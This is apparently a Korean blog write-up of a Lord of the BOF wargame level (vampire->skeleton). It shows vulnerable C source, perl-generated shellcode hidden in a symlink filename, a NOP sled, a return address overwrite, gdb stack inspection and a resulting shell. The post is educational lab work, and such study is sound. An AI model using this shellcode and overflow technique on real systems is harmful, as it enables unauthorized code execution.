if(strlen(argv[1]) > 48){

printf("argument is too long!\n");

exit(0);

}

// argc saver

saved_argc = argc;

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

// buffer hunter

memset(buffer, 0, 40); //버퍼 사라짐

// ultra argv hunter!

for(i=0; i<saved_argc; i++)

memset(argv[i], 0, strlen(argv[i])); //argv를 다 각각의 크기만큼을 0으로 덮어버림

}

[vampire@localhost vampire]$ ln -s ./ssssssss `perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[vampire@localhost vampire]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

argv error

[vampire@localhost vampire]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xcd/xff/xff/xbf"'`

stack is still your friend.

[vampire@localhost vampire]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xcd/xff/xff/xbf"'`

stack is still your friend.

[vampire@localhost vampire]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xcd\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

Segmentation fault (core dumped)

[vampire@localhost vampire]$ gdb -q ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` core

warning: core file may not match specified executable file.

Core was generated by ` '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbfffffcd in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048506

(gdb) r

Starting program: /home/vampire/./h?須?h

켚Thjo??i0chi0tijY

?y?投T?

Breakpoint 1, 0x8048506 in main ()

(gdb) x/10s $esp

0xbffffa88: "?202\004\b?\034\002@뫄퓈?

0xbffffa97: "@[\205\017@4\227\004\b`?

0xbffffaa3: "@\004?옇?용\204\004\b \227\004\b4\227\004\b綿옹\t\003@\001"

0xbffffac2: ""

0xbffffac3: ""

(중략)

0xbffffbf3: ""

0xbffffbf4: "i686"

0xbffffbf9: "/home/vampire/./h\212須\201h?fSThjo\212?\001i0chi0tij\024Y?f\fIy?投T?

0xbffffc31: "LESSOPEN=|/usr/bin/lesspipe.sh %s"

(gdb)

0xbffffc53: "USERNAME="

0xbffffc5d: "HISTSIZE=1000"

0xbffffc6b: "HOSTNAME=localhost.localdomain"

0xbffffc8a: "LOGNAME=vampire"

0xbffffc9a: "REMOTEHOST=192.168.10.141"

0xbffffcb4: "MAIL=/var/spool/mail/vampire"

0xbffffcd1: "MACHTYPE=i386-redhat-linux-gnu"

0xbffffcf0: "TERM=xterm"

0xbffffcfb: "HOSTTYPE=i386"

0xbffffd09: "PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/vampire/bin"

(gdb)

0xbffffd4c: "HOME=/home/vampire"

0xbffffd5f: "INPUTRC=/etc/inputrc"

0xbffffd74: "SHELL=/bin/bash"

0xbffffd84: "USER=vampire"

0xbffffd91: "BASH_ENV=/home/vampire/.bashrc"

0xbffffdb0: "DISPLAY=192.168.10.141:0.0"

0xbffffdcb: "LANG=en_US"

0xbffffdd6: "OSTYPE=linux-gnu"

0xbffffde7: "PWD=/home/vampire"

0xbffffdf9: "SHLVL=2"

(gdb) x/x 0xbfffffc4

0xbfffffc4: 0x6d6f682f

(gdb) x/10x 0xbfffffc4

0xbfffffc4: 0x6d6f682f 0x61762f65 0x7269706d 0x2f2e2f65

0xbfffffd4: 0xcee28a68 0x0cb16881 0x6a685453 0x68e48a6f

0xbfffffe4: 0x63306901 0x74306968

(gdb) x/10x 0xbfffffc3

0xbfffffc3: 0x6f682f00 0x762f656d 0x69706d61 0x2e2f6572

0xbfffffd3: 0xe28a682f 0xb16881ce 0x6854530c 0xe48a6f6a

0xbfffffe3: 0x30690168 0x30696863

(gdb) x/10x 0xbfffffc1

0xbfffffc1: 0x2f003a35 0x656d6f68 0x6d61762f 0x65726970

0xbfffffd1: 0x682f2e2f 0x81cee28a 0x530cb168 0x6f6a6854

0xbfffffe1: 0x0168e48a 0x68633069

(gdb) q //여기서 앞에 nop를 안넣었다는 사실을 알아챔. 읽고 찾기 힘들어서 nop를 채웠습니다.

The program is running. Exit anyway? (y or n) y

[vampire@localhost vampire]$ clear

[vampire@localhost vampire]$ rm rf *

rm: cannot remove `rf': No such file or directory

rm: j

X?Rh: is a directory

rm: remove write-protected file `skeleton'? y^Hn

rm: remove write-protected file `skeleton.c'? n

[vampire@localhost vampire]$ ls

j?X?Rh skeleton.c

[vampire@localhost vampire]$ ~~oh shit~~ //원본 프로그램 날림 이히히히히 권한이 사라졌따!

bash2: oh: command not found

[vampire@localhost vampire]$ gcc skeleton.c -o skeleton

[vampire@localhost vampire]$ ln -s ./ssssssss `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x48'`

bash2: ./????????????????????????????????????????h?須?h

SThjo??i0chi0tijY

Iy?投T? No such file or directory

[vampire@localhost vampire]$ cp skeleton ssssssss

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x48'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜

Segmentation fault (core dumped)

[vampire@localhost vampire]$ gdb -q `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` core

warning: core file may not match specified executable file.

Core was generated by ` '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbfbfbfbf in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048506

(gdb) r

Starting program: /home/vampire/????????????????????????????????????????h?須?h

켚Thjo??i0chi0tijY

?y?投T?

Breakpoint 1, 0x8048506 in main ()

(gdb) x/10x 0xbfffffcd

0xbfffffcd: 0x90909090 0x68909090 0x81cee28a 0x530cb168

0xbfffffdd: 0x6f6a6854 0x0168e48a 0x68633069 0x69743069

0xbfffffed: 0xfe59146a 0x79490c0c

(gdb) x/10x 0xbfffffd2

0xbfffffd2: 0x8a689090 0x6881cee2 0x54530cb1 0x8a6f6a68

0xbfffffe2: 0x690168e4 0x69686330 0x6a697430 0x0cfe5914

0xbffffff2: 0xfa79490c 0x54e1f741

(gdb) x/10x 0xbfffffd4

0xbfffffd4: 0xcee28a68 0x0cb16881 0x6a685453 0x68e48a6f

0xbfffffe4: 0x63306901 0x74306968 0x59146a69 0x490c0cfe

0xbffffff4: 0xf741fa79 0x00c354e1

(gdb) q

The program is running. Exit anyway? (y or n) y

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xd4\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

bash$ hell yes

sh: hell: command not found

bash$ exit

exit

[vampire@localhost vampire]$ rm ./ssssssss `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[vampire@localhost vampire]$ ln -s ./skeleton `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xd4\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

bash$ my-pass

...

중간에 프로그램을 날린 관계로

키는 찾아서 하겠습니다...ㅋ

아 안그래도 요즘 정신적으로 너무 힘든데 그나마 힐링되네요 힐링♥︎

저작자표시

'STUDY > Lord of the BOF' 카테고리의 다른 글

golem->darkknight (0)	2014.04.06
skeleton->golem (5)	2014.03.17
troll->vampire (0)	2013.12.22
orge->troll (0)	2013.12.21
darkelf->orge (0)	2013.11.22

EverTokki

전체 글

Frame Pointer Overwrite/One Byte Overflow

'STUDY > Documentation' 카테고리의 다른 글

golem->darkknight

'STUDY > Lord of the BOF' 카테고리의 다른 글

[CodeGate Junior Quals] RunCommand 250

'STUDY > Documentation' 카테고리의 다른 글

[영어]To Kill a Mockingbird Formative Essay

'ARCHIVE > 학교' 카테고리의 다른 글

skeleton->golem

'STUDY > Lord of the BOF' 카테고리의 다른 글

MISCCCCCCCCCC!

'STUDY > Documentation' 카테고리의 다른 글

제 프로필 사진 어떤가요

'KOREAN > 뻘글' 카테고리의 다른 글

vampire->skeleton

'STUDY > Lord of the BOF' 카테고리의 다른 글

+ Recent posts

티스토리툴바